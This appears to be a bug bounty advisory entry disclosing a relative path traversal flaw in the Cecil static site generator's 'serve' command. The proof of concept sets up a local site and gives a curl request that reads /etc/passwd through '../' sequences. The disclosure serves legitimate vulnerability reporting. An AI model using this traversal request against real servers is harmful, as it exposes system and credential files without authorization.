Lucene search

K
huntrOuuanCDD995B2-C983-428B-A73A-827B61B7C06B
HistorySep 07, 2023 - 12:53 p.m.

Relative Path Traversal vulnerability in the serve command

2023-09-0712:53:49
ouuan
www.huntr.dev
5
cecil
path traversal
vulnerability
proof of concept
bug bounty

0.001 Low

EPSS

Percentile

37.0%

Description

When a Cecil site is served by cecil serve, Relative Path Traversal is possible via the URI path.

Proof of Concept

Run the following commands:

mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve

Then curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd.

0.001 Low

EPSS

Percentile

37.0%

Related for CDD995B2-C983-428B-A73A-827B61B7C06B